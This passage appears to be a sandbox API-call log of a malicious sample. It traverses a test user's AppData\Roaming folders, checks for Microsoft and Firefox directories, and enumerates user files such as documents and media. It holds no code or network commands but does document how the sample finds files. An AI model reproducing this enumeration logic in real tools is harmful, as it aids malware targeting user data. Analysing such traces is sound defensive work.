(pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned 0 [0083.464] GetNamedSecurityInfoW () returned 0x0 [0083.464] LocalFree (hMem=0x572028) returned 0x0 [0083.464] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpSrch="microsoft") returned 0x0 [0083.464] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpSrch="firefox") returned 0x0 [0083.464] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0083.464] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.464] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.464] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.464] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="support" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0083.464] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned 0 [0083.464] GetNamedSecurityInfoW () returned 0x0 [0083.464] LocalFree (hMem=0x571fe8) returned 0x0 [0083.464] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpSrch="microsoft") returned 0x0 [0083.464] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpSrch="firefox") returned 0x0 [0083.464] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0083.464] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.464] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.464] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.464] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="flashplayer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0083.465] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 0 [0083.465] GetNamedSecurityInfoW () returned 0x0 [0083.465] LocalFree (hMem=0x572028) returned 0x0 [0083.465] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpSrch="microsoft") returned 0x0 [0083.465] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpSrch="firefox") returned 0x0 [0083.465] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0083.465] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0x586c60 [0083.465] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.465] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.465] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0083.465] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 0 [0083.465] GetNamedSecurityInfoW () returned 0x0 [0083.465] LocalFree (hMem=0x571fe8) returned 0x0 [0083.465] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpSrch="microsoft") returned 0x0 [0083.465] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpSrch="firefox") returned 0x0 [0083.465] PathCombineW (in: pszDest=0x18c7c8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0083.465] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 0x586ca0 [0083.465] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.465] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.465] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.465] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.465] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 0 [0083.466] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.466] Sleep (dwMilliseconds=0x0) [0083.466] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0 [0083.466] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.466] Sleep (dwMilliseconds=0x0) [0083.466] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.466] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.466] Sleep (dwMilliseconds=0x0) [0083.466] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.466] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.466] Sleep (dwMilliseconds=0x0) [0083.466] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.466] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.466] Sleep (dwMilliseconds=0x0) [0083.466] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.466] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.466] Sleep (dwMilliseconds=0x0) [0083.466] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.466] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" [0083.466] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned 0 [0083.466] GetNamedSecurityInfoW () returned 0x0 [0083.466] LocalFree (hMem=0x572028) returned 0x0 [0083.466] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", lpSrch="microsoft") returned="Microsoft" [0083.466] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", lpSrch="firefox") returned 0x0 [0083.466] Sleep (dwMilliseconds=0x0) [0083.466] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.466] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.467] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Mozilla" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla" [0083.467] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned 0 [0083.467] GetNamedSecurityInfoW () returned 0x0 [0083.467] LocalFree (hMem=0x571fe8) returned 0x0 [0083.467] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", lpSrch="microsoft") returned 0x0 [0083.467] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", lpSrch="firefox") returned 0x0 [0083.467] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*" [0083.467] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.467] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.467] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.467] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Extensions" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions" [0083.467] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned 1 [0083.467] GetNamedSecurityInfoW () returned 0x0 [0083.467] LocalFree (hMem=0x572028) returned 0x0 [0083.467] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", lpSrch="microsoft") returned 0x0 [0083.467] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", lpSrch="firefox") returned 0x0 [0083.468] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0083.468] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.468] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.468] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.468] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.468] Sleep (dwMilliseconds=0x0) [0083.468] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.468] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Firefox" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox" [0083.468] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 0 [0083.468] GetNamedSecurityInfoW () returned 0x0 [0083.468] LocalFree (hMem=0x571fe8) returned 0x0 [0083.468] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", lpSrch="microsoft") returned 0x0 [0083.468] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", lpSrch="firefox") returned="Firefox" [0083.468] Sleep (dwMilliseconds=0x0) [0083.468] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.468] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.468] Sleep (dwMilliseconds=0x0) [0083.468] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.468] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.468] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.468] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.468] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.468] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.468] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Skype" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype" [0083.468] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype") returned 0 [0083.468] GetNamedSecurityInfoW () returned 0x0 [0083.469] LocalFree (hMem=0x572028) returned 0x0 [0083.469] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", lpSrch="microsoft") returned 0x0 [0083.469] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", lpSrch="firefox") returned 0x0 [0083.469] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*" [0083.469] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.469] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.469] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.469] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", pszFile="RootTools" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools" [0083.469] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools") returned 0 [0083.469] GetNamedSecurityInfoW () returned 0x0 [0083.469] LocalFree (hMem=0x571fe8) returned 0x0 [0083.469] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", lpSrch="microsoft") returned 0x0 [0083.469] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", lpSrch="firefox") returned 0x0 [0083.469] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*" [0083.469] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.469] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.469] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.469] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.469] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.469] Sleep (dwMilliseconds=0x0) [0083.469] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.469] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.469] Sleep (dwMilliseconds=0x0) [0083.469] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.469] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.469] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 0 [0083.470] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.470] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*" [0083.470] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*", lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 0x586b20 [0083.470] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.470] PathMatchSpecW (pszFile="6s KHOwEGy9S7Ui.pptx", pszSpec="*") returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.470] PathMatchSpecW (pszFile="83D2u8nDKooEEZ.avi", pszSpec="*") returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.470] PathMatchSpecW (pszFile="9cIv.mp3", pszSpec="*") returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.470] PathMatchSpecW (pszFile="9rKKEdWHzAr2h.ppt", pszSpec="*") returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.470] PathMatchSpecW (pszFile="a3ZfsA3.bmp", pszSpec="*") returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.470] PathMatchSpecW (pszFile="a6-2v.swf", pszSpec="*") returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.470] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe" [0083.470] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*" [0083.470] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.470] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.470] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Acrobat" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat" [0083.470] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0083.470] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.470] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.470] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="10.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0" [0083.470] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*" [0083.470] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.470] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.470] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.470] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Collab" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab" [0083.470] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*" [0083.470] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.471] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.471] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Forms" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms" [0083.471] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*" [0083.471] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.471] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.471] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="JavaScripts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts" 